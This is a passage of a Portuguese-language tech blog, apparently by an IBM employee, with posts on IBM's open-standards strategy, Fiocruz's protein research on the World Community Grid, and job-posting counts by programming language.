A última fronteira é a convergência gradativa dos produtos de workgroup baseados em Lotus Notes com o novo Workplace Client Technology, que implementa Padrões Abertos, e que é baseado no Eclipse (como dezenas de outros produtos da IBM).

E digo mais: as tecnologias proprietárias que usamos internamente nos nossos desktops, tivemos que adotá-las porque quando surgiu a necessidade de resolver o problema de negócio que elas resolvem, simplesmente não haviam opções que implementassem Padrões Abertos. Conforme surgem Padrões para aquele determinado problema, isso entra em pauta e a migração é estudada seriamente. Logicamente analizando custos, funcionalidades, viabilidade, etc, porque essa é a forma racional de se fazer mudanças.

Padrões Abertos. Padrões Abertos. Padrões Abertos. Essas são as palavras do momento.

Para o mundo comercial, isso é mais importante do que ter acesso ao código fonte de um software. E é algo que deve estar sempre presente na pauta de TI do CIO.

Pregamos que companhias que inovam reutilizando Padrões Abertos levam vantagem porque seus recursos são liberados para trabalhos que agregam maior valor, e porque as oportunidades do mercado se expandem à medida que os Padrões Abertos proliferam.

É o que dizemos aos nossos clientes. É o que acreditamos. E é o que fazemos.

Fiocruz no World Community Grid

World Community GridO World Community Grid é um projeto fantástico onde pessoas como você e eu doam o poder computacional ocioso de nossos PCs para ajudar a encontrar a cura do cancer e outras doenças, descobrir detalhes de proteinas humanas, fazer pesquisa genética, enfim, mastigar dados a fim de melhorar o mundo.

WCG rodando o algoritmo da Fundação Oswaldo CruzEu rodo ele no meu laptop a anos e até ontem eu estava “ajudando” a curar a AIDS. Hoje fiquei impressionado porque tudo mudou. Nossa brasileiríssima Fundação Oswaldo Cruz está usando o WCG para “achar similaridades entre proteinas de todas as seqüências de genomas dos organismos do mundo. Essas relações entre proteinas vão ajudar a inferir suas prováveis funções e estruturas, levando a novas descobertas em medicina e biologia“. Uau !

O screensaver do WCG que se instala nos PCs é um programa genérico, apto a receber um bloco de dados mais um pedaço de software capaz de processa-lo. Ele faz tudo isso sincronizado com o grid do WCG, enviando os resultados e recebendo um novo bloco para processar. O resultado é um belo e útil screensaver.

Veja esta interativa e divertida animação explicando o funcionamento de um grid computacional.

Instale o screensaver em seu computador. Está disponível p/ Linux, Windows e Mac. É muito bom saber que de alguma forma podemos ajudar essas tão importantes pesquisas.

Linguagens de Programação na Indústria

Um artigo da eWeek relaciona algumas linguagens e os motivos pelos quais deve-se aprender cada uma delas.

Um dado interessante do artigo é o número de vagas de trabalho disponíveis no mercado, para cada skill de linguagem, extraidas de dice.com.

Coloquei em ordem crescente de número de vagas:

  1. Ruby e Ruby on Rails :: Job availabilities: 210 and 54, respectively
  2. Python :: Job availabilities: 811
  3. AJAX :: Job availabilities: 1,106
  4. PHP :: Job availabilities: 1,152
  5. VB.Net :: Job availabilities: 2,090
  6. JavaScript :: Job availabilities: 4,406
  7. Perl :: Job availabilities: 4,810
  8. C# :: Job availabilities: 5,111
  9. C :: Job availabilities: 6,164, including all derivatives
  10. Java :: Job availabilities: 14,408

Note que os números nada tem a ver com a qualidade, funcionalidade ou facilidade inerente da linguagem de programação/tecnologia. Mas os números parecem dar uma pista da presença, maturidade e ecossistema de cada uma delas no mercado.

É o que um amigo meu diz: “Tu tem que ir de megafone para a avenida Paulista as 12:30 e perguntar quem é que manja de tal tecnologia ou produto. Esse é um bom indicador de seu ecossistema.”